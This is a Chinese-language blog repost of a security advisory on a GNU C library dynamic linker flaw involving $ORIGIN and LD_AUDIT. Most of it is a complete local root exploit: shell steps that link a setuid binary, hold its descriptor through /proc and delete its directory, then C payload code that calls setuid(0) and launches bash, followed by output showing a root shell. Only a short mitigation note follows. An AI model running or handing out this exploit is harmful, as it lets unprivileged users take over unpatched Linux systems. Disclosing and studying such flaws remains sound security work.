GNU C library 动态链接区 $ORIGIN 溢出漏洞

GNU C library dynamic linker $ORIGIN expansion Vulnerability

from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2

动态链接器（或动态加载器）是为连接运行时负责动态链接程序。 ld.so运行在两个安全模式，一个是宽松模式，使超过负荷运行控制程度高，一个是安全模式（libc_enable_secure）旨在防止用户的干扰装载特权可执行文件。

至少有以下版本已经过测试

2.12.1, FC13

2.5, RHEL5 / CentOS5

影响：

可以利用这个漏洞以root权限执行任意代码

代码如下：

$ mkdir /tmp/exploit

链接到一个suid的二进制，从而改变$ORIGIN的定义

$ ln /bin/ping /tmp/exploit/target

打开文件描述符的目标二进制

$ exec 3< /tmp/exploit/target

该描述符号现在应该可以通过/ proc来访问

$ ls -l /proc/$$/fd/3

删除以前创建的目录

$ rm -rf /tmp/exploit/

/ proc的链接应该仍然存在，但现在将被标记为删除

$ ls -l /proc/$$/fd/3

更换一个有效载荷DSO的目录，从而制造 $ORIGIN对于dlopen()的有效目标

$ cat > payload.c

void __attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

^D

$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

$ ls -l /tmp/exploit

现在强行把位于/proc的链接通过LD AUDIT来加载$ORIGIN

$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

这样就取得了root权限

sh-4.1# whoami

root

sh-4.1# id

uid=0(root) gid=500(taviso)

缓解方法：

阻止用户在mounted的文件系统上创建文件

解决方法：

主要发行商应该在短期内发布最新的glibc包

本文来自CSDN博客，转载请标明出处：http://blog.csdn.net/ydt619/archive/2010/10/20/5954199.aspx